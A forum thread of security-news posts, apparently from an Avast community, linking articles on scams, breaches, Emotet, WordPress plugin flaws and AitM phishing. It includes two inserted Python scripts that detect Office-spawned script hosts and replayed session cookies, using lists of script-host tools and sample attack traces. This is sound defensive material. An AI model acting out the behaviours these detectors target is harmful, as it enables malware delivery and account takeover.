https://youtu.be/Hr2QzXPAIug
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Hi bob3160,
Musk's acquiring Twitter has been put on hold for the moment. See and search at -nitter.com.
He won't be happy either with the EU granting a law to screen all social media messages to be able to trace possible child and grooming abuse messaging. Total surveillance has been and will be upon us sooner or later, as they will find some excuse for totalitarian measures. :-\
polonus
-
Hi bob3160,
Musk's acquiring Twitter has been put on hold for the moment. See and search at -nitter.com.
He won't be happy either with the EU granting a law to screen all social media messages to be able to trace possible child and grooming abuse messaging. Total surveillance has been and will be upon us sooner or later, as they will find some excuse for totalitarian measures. :-\
polonus
The "hold" is covered in the video. :)
-
Apple emergency update fixes zero-day used to hack Macs, Watches
https://www.bleepingcomputer.com/news/security/apple-emergency-update-fixes-zero-day-used-to-hack-macs-watches/
-
Large-scale attacks on WordPress websites with the Tatsu Builder plug-in.
This could concern over 50.000 vulnerable websites:
https://www.wordfence.com/blog/2022/05/millions-of-attacks-target-tatsu-builder-plugin/
See: https://nvd.nist.gov/vuln/detail/CVE-2021-25094
polonus
-
Why is everyone getting hacked on Facebook?
https://blog.avast.com/facebook-hacks
-
NVIDIA fixes ten vulnerabilities in Windows GPU display drivers
https://www.bleepingcomputer.com/news/security/nvidia-fixes-ten-vulnerabilities-in-windows-gpu-display-drivers/
-
Critical Jupiter WordPress plugin flaws let hackers take over sites
https://www.bleepingcomputer.com/news/security/critical-jupiter-wordpress-plugin-flaws-let-hackers-take-over-sites/
-
Weekly Security News Roundup w/e 5-20-2022
https://youtu.be/FdlCqi3uR9w
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
The biggest financial scams of 2022
https://blog.avast.com/top-financial-scams
-
Photos of abused victims used in new ID verification scam
https://www.bleepingcomputer.com/news/security/photos-of-abused-victims-used-in-new-id-verification-scam/
-
DuckDuckGo under fire for letting Microsoft scripts through in its browser.
It has come to an agreement with Microsoft not to block Microsoft on third-party websites.
Particular scripts exist that you can add to the Tampermonkey extension to block these again.
polonus
-
This issue with DuckDuckGo is with their DuckDuckGo browser on android.
How do browsers compare privacy-wise?
(because privacy and anonymity really no longer exist) results are not absolute.
Just see here: https://privacytests.org/ The winner seems to be: https://librewolf.net
polonus
-
The biggest financial scams of 2022
https://youtu.be/eZ5OiCw7xaY
Learn how to protect yourself – and your cash – from the dirtiest tricks on the web.
Thanks to GRACE MACEJ (https://blog.avast.com/author/grace-macej) for her excellent article on this topic.
https://blog.avast.com/top-financial-scams
-
DuckDuckGo under fire for letting Microsoft scripts through in its browser.
It has come to an agreement with Microsoft not to block Microsoft on third-party websites.
Particular scripts exist that you can add to the Tampermonkey extension to block these again.
polonus
DuckDuckGo browser allows Microsoft trackers due to search agreement
https://www.bleepingcomputer.com/news/security/duckduckgo-browser-allows-microsoft-trackers-due-to-search-agreement/
-
DuckDuckGo under fire for letting Microsoft scripts through in its browser.
It has come to an agreement with Microsoft not to block Microsoft on third-party websites.
Particular scripts exist that you can add to the Tampermonkey extension to block these again.
polonus
DuckDuckGo browser allows Microsoft trackers due to search agreement
https://www.bleepingcomputer.com/news/security/duckduckgo-browser-allows-microsoft-trackers-due-to-search-agreement/
This is a strange turn of events for DuckDuckGo.
Whilst I don't use the DuckDuckGo browser, the reason I find this interesting is, it isn't all that long ago that I stopped using the DuckDuckGo browser add-on and also dropped the DuckDuckGo search option in Firefox. The main reason for that is that the DuckDuckGo add-on was too intrusive and I felt it broke some sites.
DuckDuckGo had also somehow become my default search engine a couple of times in Firefox, which I hadn't changed at all, and I changed it back to my default search engine. The worst part was that DuckDuckGo searches returned a pathetically small number of hits (useless would be a good word to use).
All in all for me it has gone downhill very rapidly.
-
New ChromeLoader malware surge threatens browsers worldwide
https://www.bleepingcomputer.com/news/security/new-chromeloader-malware-surge-threatens-browsers-worldwide/
-
How license plate scanners challenge our data privacy
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/26/10/41/c3hO6pVr7HS/preview.jpg)
https://youtu.be/orNe0T4VQpg (https://youtu.be/orNe0T4VQpg)
There's a massive amount of data in private hands
and without sufficient controls by the government.
My thanks to David Strom for his excellent article.
https://blog.avast.com/license-plate-scanners-data-privacy
-
Intuit warns of QuickBooks phishing threatening to suspend accounts
https://www.bleepingcomputer.com/news/security/intuit-warns-of-quickbooks-phishing-threatening-to-suspend-accounts/
-
luntrus searched on IntelligeX for CVE-2022-1853;
this is a vulnerability just being patched in a new Google Chrome version.
Search results - https://attackerkb.com/topics/NhNbhpIsam/cve-2022-1853
2020-12-21 11:24:32
attackerkb.com - Topics | AttackerKB 2020-12-21 - 2021-11-23
├── about - About | AttackerKB 2020-12-30 - 2021-11-23
├── activity-feed - Activity Feed | AttackerKB 2020-12-30 - 2021-11-23
├── leaderboard - Leaderboard | AttackerKB 2020-12-30 - 2021-11-23
├── search?attackVector=LOCAL&q= - Search Results | AttackerKB 2020-12-30 - 2021-01-31
├── search?privilegesRequired=LOW&q= - Search Results | AttackerKB 2020-12-30 - 2021-01-31
├── search?q=&userInteraction=NONE - Search Results | AttackerKB 2020-12-30 - 2021-01-31
├── search?userInteraction=NONE - Search Results | AttackerKB 2020-12-30
└── topics - Topics | AttackerKB 2020-12-30 - 2021-11-23
├── 1yvp3hVNSN/cve-2020-17136?referrer=home - CVE-2020-17136 | AttackerKB 2020-12-30 - 2021-01-31
└── DCzIXKVJbk/cve-2020-0662 - CVE-2020-0662 | AttackerKB
Description
** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided. Info credits go to luntrus.
polonus
-
Weekly Security News Roundup w/e 5-27-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/27/20/14/c3htY2Vr8t0/preview.jpg)
https://youtu.be/P1bmPo_Tx1o (https://youtu.be/P1bmPo_Tx1o)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Will Hollywood’s Lawsuits Shut Down Your Favorite VPN?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/31/21/09/c3hwrQV3eqm/preview.jpg)
https://youtu.be/cCEOn7cFdHA (https://youtu.be/cCEOn7cFdHA)
If you want to torrent copyrighted material, a VPN will hide what you’re doing.
Well, for now, at least. Read the full article on this topic at,
https://www.howtogeek.com/807819/will-hollywoods-lawsuits-shut-down-your-favorite-vpn/
-
FBI warns of Ukrainian charities impersonated to steal donations
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ukrainian-charities-impersonated-to-steal-donations/
-
FBI warns of Ukrainian charities impersonated to steal donations
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ukrainian-charities-impersonated-to-steal-donations/
Just when you think these bottom feeding pond scum can't get any lower, you see just how low they can get.
-
FBI warns of Ukrainian charities impersonated to steal donations
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ukrainian-charities-impersonated-to-steal-donations/ (https://www.bleepingcomputer.com/news/security/fbi-warns-of-ukrainian-charities-impersonated-to-steal-donations/)
Just when you think these bottom feeding pond scum can't get any lower, you see just how low they can get.
They never miss an opportunity to make money.
-
Actually, the "lowest" any criminal can get is when they take a human life with the money motive being the reason for the murder.
I mean, is anyone really surprised the criminal elements would use that conflict to do what we are being informed about by the FBI?
Truthfully, charities have been a target of scams for a very long time, and even before these Net crimes came about.
Criminal folks just ain't too cool. But I should be very careful. I've never been convicted in a court of law, but I have been jailed a few times for fighting. And a couple of those times were for fighting law enforcement folks that had gone too far while doing their job. Last time, though, I didn't know the fella was an undercover cop.
Point is that maybe I am a semi-criminal. I smoked a joint once many, many years ago when that was illegal. Funny, too, as that was with a cop; an MP.
Anyway, using charities for cover in a criminal manner to get money is nothing new.
-
Telegram’s blogging platform abused in phishing attacks
https://www.bleepingcomputer.com/news/security/telegram-s-blogging-platform-abused-in-phishing-attacks/
-
Critical Atlassian Confluence zero-day actively used in attacks
https://www.bleepingcomputer.com/news/security/critical-atlassian-confluence-zero-day-actively-used-in-attacks/
-
Weekly Security News Roundup w/e 6-3-2022
(https://i.imgur.com/9bGVFOlm.jpg) (https://i.imgur.com/9bGVFOl.png)
https://youtu.be/5mk1n73d-fg (https://youtu.be/5mk1n73d-fg)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Alert (AA22-158A) - People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
https://www.cisa.gov/uscert/ncas/alerts/aa22-158a
-
Emotet malware now steals credit cards from Google Chrome users
https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-credit-cards-from-google-chrome-users/
-
Weekly Security News Roundup w/e 6-10-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/06/10/16/37/c316DAV3USs/preview.jpg)
https://youtu.be/-P-VdJK-uXc (https://youtu.be/-P-VdJK-uXc)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Hacked Instagram accounts are scamming users
https://blog.avast.com/instagram-scams
-
Drupal Releases Security Updates
https://www.cisa.gov/uscert/ncas/current-activity/2022/06/13/drupal-releases-security-updates
-
L.S.
In addition to what my good forum friend, Asyn, posted on the new Emotet variant earlier here.
Emotet malware steals your credit card data from inside Google Chrome.
Analysis: https://www.joesandbox.com/analysis/326849/1/html
We see three Windows executables involved: the winword executable,
out there to lure you into lowering your defenses by executing macros etc.;
the actual powershell.exe to siphon your data out, the actual e-banking fraud;
conhost.exe as a system executable (to bypass AV detection).
Would VoodooShield and/or OSArmor have signalled
the bad actions of these Windows executables right away?
MS does not describe these as vulnerabilities, but rather qualifies them as "features".
So now one understands why not to run Windows OS as admin, whenever you can avoid it.
A good 70% or more of AV vendors now detect and flag Emotet for the devious malware it is.
polonus
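The chain polonus describes (a Word document handing off to powershell.exe) is the kind of parent/child relationship a behaviour blocker or EDR rule keys on. The script below is an added example for this thread, not code from the post, from Joe Sandbox or from any AV product: it walks a process tree built from constructed sample events (made-up `key=value` lines, not any product's real log format) and flags script hosts that descend from an Office application, even through an intermediate cmd.exe. conhost.exe is left out of the match set on purpose: Windows attaches it to every console program, so its presence alone says nothing.

```python
"""Flag script hosts that descend from an Office application.

Added example for this thread, not code from the post or from any AV
product. The process-creation events below are constructed sample data
in a made-up "key=value" format, not any product's real log format.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample events: a Word document drops to cmd.exe, which starts
# powershell.exe; conhost.exe is the console host Windows attaches to any
# console program, so it appears under powershell.exe whether the run is
# malicious or not. A separate powershell.exe started from explorer.exe
# (pid 1700) is an ordinary interactive shell and must not be flagged.
SAMPLE_EVENTS = """\
2022-06-13T09:01:02Z pid=1200 ppid=900 image=explorer.exe user=alice
2022-06-13T09:01:05Z pid=1300 ppid=1200 image=WINWORD.EXE user=alice
2022-06-13T09:01:40Z pid=1400 ppid=1300 image=cmd.exe user=alice
2022-06-13T09:01:41Z pid=1500 ppid=1400 image=powershell.exe user=alice
2022-06-13T09:01:41Z pid=1600 ppid=1500 image=conhost.exe user=alice
2022-06-13T09:05:10Z pid=1700 ppid=1200 image=powershell.exe user=alice
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class Proc:
    ts: str
    pid: int
    ppid: int
    image: str   # lower-cased image file name
    user: str


def parse_events(text: str) -> Dict[int, Proc]:
    """Parse the constructed event lines into a pid -> Proc table."""
    procs: Dict[int, Proc] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        proc = Proc(ts, int(kv["pid"]), int(kv["ppid"]), kv["image"].lower(), kv["user"])
        procs[proc.pid] = proc
    return procs


def office_ancestor(pid: int, procs: Dict[int, Proc], max_depth: int = 8) -> Optional[str]:
    """Walk up the parent chain of `pid`; return the first Office image met, else None.

    Walking the whole chain (not just the direct parent) is what catches the
    WINWORD -> cmd -> powershell indirection; max_depth guards against loops
    in incomplete or recycled-pid data.
    """
    cur = procs.get(pid)
    for _ in range(max_depth):
        if cur is None:
            return None
        parent = procs.get(cur.ppid)
        if parent is None:
            return None
        if parent.image in OFFICE_APPS:
            return parent.image
        cur = parent
    return None


def office_spawned_script_hosts(procs: Dict[int, Proc]) -> List[Tuple[int, str, str]]:
    """Return (pid, image, office_ancestor) for every script host under an Office app."""
    hits = []
    for pid in sorted(procs):
        proc = procs[pid]
        if proc.image in SCRIPT_HOSTS:
            ancestor = office_ancestor(pid, procs)
            if ancestor:
                hits.append((pid, proc.image, ancestor))
    return hits


if __name__ == "__main__":
    for pid, image, ancestor in office_spawned_script_hosts(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT pid={pid} {image} descends from {ancestor}")
```

Run as-is it reports pids 1400 and 1500 and stays quiet about the interactive powershell.exe under explorer.exe. The same rule, fed real Sysmon event ID 1 or EDR process-creation data, is a standard starting point for catching macro-based droppers regardless of which AV signature does or does not exist yet.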
-
Don’t be fooled by lottery scams
https://blog.avast.com/lottery-scams
-
Weekly Security News Roundup w/e 6-17-2022
(https://i.imgur.com/h0SJiawm.jpg) (https://i.imgur.com/h0SJiaw.png)
https://youtu.be/PqG9ZRxAVAo (https://youtu.be/PqG9ZRxAVAo)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Microsoft: June Windows updates may break Wi-Fi hotspots
https://www.bleepingcomputer.com/news/microsoft/microsoft-june-windows-updates-may-break-wi-fi-hotspots/
-
Don’t be fooled by lottery scams
https://blog.avast.com/lottery-scams (https://blog.avast.com/lottery-scams)
Don’t be fooled by lottery scams
(https://i.imgur.com/BPfTl0Am.jpg) (https://i.imgur.com/BPfTl0A.png)
https://youtu.be/Q8BQccCX2ts (https://youtu.be/Q8BQccCX2ts)
These scams can come by email, text, or regular mail –
here’s how to identify them.
Thanks to Grace Macej for her excellent article.
https://blog.avast.com/author/grace-macej
-
After I downloaded some software and ran it, a cmd window opened and ran a command, and now I have Avast blocking this file on the firewall ALL THE TIME. I don't know what it is nor how to remove it. When I ran the virus scanner it isn't recognized as a virus.
-
Vishing scams are on the rise
(https://i.imgur.com/biniebXm.jpg) (https://i.imgur.com/biniebX.png)
https://youtu.be/7D-ZKlMJUes (https://youtu.be/7D-ZKlMJUes)
Vishing scams can come in many forms, but they generally involve two vectors
that both aim at getting you to hand over your information.
To find out what Interpol is doing about this problem, look at GRACE MACEJ (https://blog.avast.com/author/grace-macej)’s
excellent article at the following link:
https://blog.avast.com/vishing-scams (https://blog.avast.com/vishing-scams)
-
Weekly Security News Roundup w/e 6-24-2022
(https://i.imgur.com/PDs0skvm.jpg) (https://i.imgur.com/PDs0skv.png)
https://youtu.be/Nziyr3rtnG0 (https://youtu.be/Nziyr3rtnG0)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
-
The right way to handle Cookie Banners
(https://i.imgur.com/IWqSP1Mm.jpg) (https://i.imgur.com/IWqSP1M.png)
https://youtu.be/KMFa_1_4eTU (https://youtu.be/KMFa_1_4eTU)
When you get to a website and are greeted with a Cookie Banner,
here's the right action to take and it is NOT Accept All.
-
Weekly Security News Roundup w/e 7-1-2022
(https://i.imgur.com/CQLxihSm.jpg) (https://i.imgur.com/CQLxihS.png)
https://youtu.be/fIDX8xcDpgA (https://youtu.be/fIDX8xcDpgA)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging research.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
-
Avoiding medical scams
(https://i.imgur.com/Nvg5B6gm.jpg) (https://i.imgur.com/Nvg5B6g.png)
https://youtu.be/FkWLsid4F4c (https://youtu.be/FkWLsid4F4c)
Follow these tips to recognize and avoid both
Durable Medical Equipment (DME) fraud and
Medical identity theft.
Read Grace Macej's comprehensive article on this topic.
https://blog.avast.com/medical-scams (https://blog.avast.com/medical-scams)
-
Weekly Security News Roundup w/e 7-9-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/07/09/18/15/c3iQFoV0g1J/preview.jpg)
https://youtu.be/p9rQHxstNv4 (https://youtu.be/p9rQHxstNv4)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
L.S.
Weak smb1 and how it is being abused.
And there are such NSA exploits that later come back to bite the community in the form of malcode modified by cybercriminals into RATs and ransomware:
See: https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/
polonus
-
L.S.
Weak smb1 and how it is being abused.
And there are such NSA exploits that later come back to bite the community in the form of malcode modified by cybercriminals into RATs and ransomware:
See: https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/ (https://threatpost.com/eternalblue-exploit-spreading-gh0st-rat-nitol/126052/)
polonus
Why are folks still using SMB1?
-
Most devious and effective recent black hat fraud attack:
https://www.microsoft.com/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/
More than ten thousand organizations fell victim to a phishing attack where proxy servers are being abused to be able to circumvent 2FA. Such compromised accounts are abused to commit so-called BEC fraud (BEC = Business Email Compromise).
One could receive an email to listen in to a voicemail. When one opens the HTML file attached, one will get redirected to a phishing site. Office users are being attacked in this way. Do not fall for this fraud scheme.
MS has a survey of all domains used in this fraud. Train your awareness to see if the site is the real McCoy or not. And as always, MS asks you once and you will stay logged in forever.
Later people are astonished as they can no longer sign on to their MS or Google account.
Never log in from an email that you did not initiate yourself.
Microsoft logging you out of such sessions could be a remedy.
And MS should log and check on these abused IP addresses.
polonus
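In the proxy (AitM) scheme polonus describes, the victim does complete sign-in, MFA included, but through the proxy, so what the actor ends up holding is the session cookie, which is then replayed from the actor's own infrastructure. That gives the defender the signal the post asks for: a session token used from a different network than the one that signed in, followed by mailbox changes. The script below is an added example for this thread, not code from the post or from Microsoft; the sign-in log lines, the `key=value` layout, the session ids and the ASN labels are constructed for illustration and are not any provider's real format.

```python
"""Spot a session token replayed from a different network than the one that
completed sign-in, then narrow to the BEC-style actions that followed.

Added example for this thread, not code from the post or from Microsoft.
The log lines are constructed; the "key=value" layout, session ids and ASN
labels are made up for illustration and are not any provider's real format.
"""
from typing import Dict, List, Tuple

# Constructed sample: alice signs in (MFA satisfied) from one network; minutes
# later the same session id is used from another ASN to create an inbox rule
# and send mail, a typical BEC follow-up. bob's session stays on one network.
SAMPLE_SIGNIN_LOG = """\
2022-07-12T08:00:01Z user=alice session=S1 event=login mfa=satisfied ip=203.0.113.10 asn=AS64500
2022-07-12T08:00:30Z user=alice session=S1 event=mailbox_read ip=203.0.113.10 asn=AS64500
2022-07-12T08:15:00Z user=alice session=S1 event=inbox_rule_created ip=198.51.100.7 asn=AS64496
2022-07-12T08:16:00Z user=alice session=S1 event=mail_sent ip=198.51.100.7 asn=AS64496
2022-07-12T09:00:00Z user=bob session=S2 event=login mfa=satisfied ip=192.0.2.44 asn=AS64501
2022-07-12T09:05:00Z user=bob session=S2 event=mailbox_read ip=192.0.2.44 asn=AS64501
"""

# Post-compromise actions that turn a hijacked mailbox into BEC fraud.
BEC_ACTIONS = {"inbox_rule_created", "mail_sent", "forwarding_enabled"}


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse the constructed log lines into dicts; the timestamp becomes 'ts'."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        rec = dict(f.split("=", 1) for f in fields)
        rec["ts"] = ts
        records.append(rec)
    return records


def session_network_changes(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return every post-login event whose ASN differs from the ASN seen at login.

    MFA was satisfied at login, so a later use of the same session from another
    network means the cookie, not the password, is what the actor is holding.
    """
    login_origin: Dict[str, Dict[str, str]] = {}
    findings = []
    for rec in records:
        sid = rec["session"]
        if rec["event"] == "login":
            login_origin[sid] = {"ip": rec["ip"], "asn": rec["asn"]}
            continue
        origin = login_origin.get(sid)
        if origin is None or rec["asn"] == origin["asn"]:
            continue
        findings.append({
            "user": rec["user"], "session": sid, "ts": rec["ts"], "event": rec["event"],
            "login_ip": origin["ip"], "login_asn": origin["asn"],
            "new_ip": rec["ip"], "new_asn": rec["asn"],
        })
    return findings


def sessions_to_revoke(records: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """(user, session) pairs where a BEC-style action came from the new network.

    Revoking these sessions is the remedy the post suggests; the inbox rules
    and sent items from the same window are what to review afterwards.
    """
    return sorted({(f["user"], f["session"]) for f in session_network_changes(records)
                   if f["event"] in BEC_ACTIONS})


if __name__ == "__main__":
    for f in session_network_changes(parse_log(SAMPLE_SIGNIN_LOG)):
        print(f"{f['ts']} {f['user']} session {f['session']}: {f['event']} from "
              f"{f['new_ip']} ({f['new_asn']}), signed in from {f['login_ip']} ({f['login_asn']})")
    print("revoke:", sessions_to_revoke(parse_log(SAMPLE_SIGNIN_LOG)))
```

Two caveats a practitioner would add. Mobile users roam between networks, so an ASN change on its own is a triage signal to combine with the action type, not an automatic block. And under AitM the "login" IP is the proxy's, not the user's, so comparing the login network against the user's usual networks is a second check this example does not perform.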
-
Weekly Security News Roundup w/e 7-15-2022
(https://i.imgur.com/7TDxqPKm.jpg) (https://i.imgur.com/7TDxqPK.png)
https://youtu.be/s6_OXSYCvJY (https://youtu.be/s6_OXSYCvJY)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Large-scale attack found on WordPress CMS with plug-in, Kaswara Modern WPBakery Page Builder add-on, leak description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24284
Developers never came up with an update and will not. Around 4 to 8 thousand websites still have this vulnerable add-on installed. Recently an exploit for this hole was run on 1.6 million WordPress websites.
Vulnerability is qualified as high - 10.0, users are being advised to remove the add-on a.s.a.p.
polonus
-
Weekly Security News Roundup w/e 7-22-2022
(https://i.imgur.com/ZSbFugUm.jpg) (https://i.imgur.com/ZSbFugU.png)
https://youtu.be/5tzBokTALe0 (https://youtu.be/5tzBokTALe0)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Weekly Security News Roundup w/e 7-29-2022
(https://i.imgur.com/hKM58Mtm.jpg) (https://i.imgur.com/hKM58Mt.png)
https://youtu.be/RtjFODhSxtc (https://youtu.be/RtjFODhSxtc)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Weekly Security News Roundup w/e 8-5-2022
(https://i.imgur.com/lxefwjQm.jpg) (https://i.imgur.com/lxefwjQ.png)
https://youtu.be/7BMIP5N1W8Y (https://youtu.be/7BMIP5N1W8Y)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Weekly Security News Roundup w/e 8-12-2022
(https://i.imgur.com/2cSiFUrm.jpg) (https://i.imgur.com/2cSiFUr.png)
https://youtu.be/FvinQskruUk (https://youtu.be/FvinQskruUk)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Six Common Internet Scams and How To Avoid Them
(https://i.imgur.com/RRc9RuUm.jpg) (https://i.imgur.com/RRc9RuU.png)
https://youtu.be/MOH_TD5_yQo (https://youtu.be/MOH_TD5_yQo)
To help ensure that you (and your mom, sister, friends, and boss)
don’t become the victim of an online scammer, here are six common types
of internet scams and how to avoid them.
My thanks to Emma McGowan for her excellent article on this topic,
https://blog.avast.com/majority-americans-targeted-scammers (https://blog.avast.com/majority-americans-targeted-scammers)
-
Weekly Security News Roundup w/e 8-19-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/19/13/07/c3jqIiVT2W5/preview.jpg)
https://youtu.be/p2p1-1WUmj0 (https://youtu.be/p2p1-1WUmj0)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
-
Security News Flash - Apple Zero-Day Exploit
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/20/17/15/c3jYboVTbQO/preview.jpg)
https://youtu.be/PLl55Dixr0A (https://youtu.be/PLl55Dixr0A)
A serious Apple Zero-Day exploit vulnerability that needs your immediate attention.
Patch your devices NOW.
-
Twitter Accused of Cybersecurity Mismanagement
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/23/16/14/c3j0D2VTZDM/preview.jpg)
https://youtu.be/kxHFLLAD9ws (https://youtu.be/kxHFLLAD9ws)
Ex-security chief accuses Twitter of cybersecurity mismanagement.
Peiter “Mudge” Zatko has accused his former employer of
cybersecurity negligence in an explosive whistleblower complaint.
-
Plex Data Breach
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/24/11/49/c3jZXdVTO77/preview.jpg)
https://youtu.be/I0UJNZ-7gjg (https://youtu.be/I0UJNZ-7gjg)
Plex Data Breach. Change your password ASAP.
It's also advisable to set up 2FA if you haven't already done so
-
What's Vishing and How Can I Protect Myself?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/24/22/29/c3jZ3UVTupN/preview.jpg)
https://youtu.be/_zPFvHHl4tE (https://youtu.be/_zPFvHHl4tE)
Find out all about Vishing and how to protect yourself to avoid becoming a victim.
This video also explains some of the other terms in the Phishing category.
My thanks to Grace Macej for her excellent article on this topic.
You'll find it here: https://blog.avast.com/stay-protected-vishing-scams (https://blog.avast.com/stay-protected-vishing-scams)
-
LastPass was just Breached
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/25/22/43/c3jT35VTxnk/preview.jpg)
https://youtu.be/Q7VOXWeHDTY (https://youtu.be/Q7VOXWeHDTY)
LastPass, one of the most used password managers, is sending out emails
warning users that it suffered a breach.
Read more at How-To Geek - https://bit.ly/3CFYltg (https://bit.ly/3CFYltg)
-
Weekly Security News Roundup w/e 8-26-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/26/21/54/c3jOrLVTacn/preview.jpg)
https://youtu.be/iu3oAWfjBeU (https://youtu.be/iu3oAWfjBeU)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the show notes.
This was an especially bad week for breaches.
-
Caution: A Google Translate Desktop App Is Malware
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/08/31/14/19/c3jw2qVTGGe/preview.jpg)
https://youtu.be/gq_d48L7Nhw (https://youtu.be/gq_d48L7Nhw)
A popular Desktop App turns out to be Malware. It turns itself into a Cryptominer.
-
Check Point Research detects Crypto Miner malware disguised as Google translate desktop and other legitimate applications
This allowed the campaign to successfully operate under the radar for years.
https://research.checkpoint.com/2022/check-point-research-detects-crypto-miner-malware-disguised-as-google-translate-desktop-and-other-legitimate-applications/
https://www.virustotal.com/gui/file/a10a519001914c79b5821897438a7750377d5d3050a951a620fd97b423231f01/detection
https://www.virustotal.com/gui/file/06b82ade22acd5144baa895ce9f2913a36e7e11ad8d3f3b1e68f3d2e6752324e/detection
https://www.virustotal.com/gui/file/4b3aba66ab3dc7d8dfb3d45368983ab939dc01513b36df6f3b00a5a81a0a289d/detection
https://www.virustotal.com/gui/file/572915444ac64f8c3f07d9203824ddb42081b11271d9b6906f5157074a0c3753/detection
https://www.virustotal.com/gui/file/6a1108756c1f5d7c975d457a15d008863b773fba68a393b5d137847eae828316/detection
https://www.virustotal.com/gui/file/ddbee267683032d4c6e0a4dc734324d3e0e117ecc150583bbc3a87e8a4414901/detection
-
@Pondus,
That's exactly what my video is about.
I reported this to Avast and Avast is now detecting it.
-
Weekly Security News Roundup w/e 9-2-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/02/21/35/c3QnraVTMte/preview.jpg)
https://youtu.be/qMLhqAnJGfs (https://youtu.be/qMLhqAnJGfs)
Security-related news thanks mostly to Avast Software.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
I'm just a messenger. They do most of the challenging research.
Links to the articles referenced in this video are part of the video show notes.
-
Samsung Data Breach
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/03/17/36/c3QebzVTLOr/preview.jpg)
https://youtu.be/Y5cAbeLB3ew (https://youtu.be/Y5cAbeLB3ew)
Another breach. This time it's Samsung. The information revealed includes the following:
name, contact and demographic information, date of birth, and product registration information.
-
Watch Out For Brushing Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/09/07/21/50/c3QirKVOeI8/preview.jpg)
https://youtu.be/FBJtnctdSuQ (https://youtu.be/FBJtnctdSuQ)
Millions of people across the US and other countries are surprised to receive packages they never ordered.
In most cases, the source is a scam called “brushing.” Watch the video to learn more.
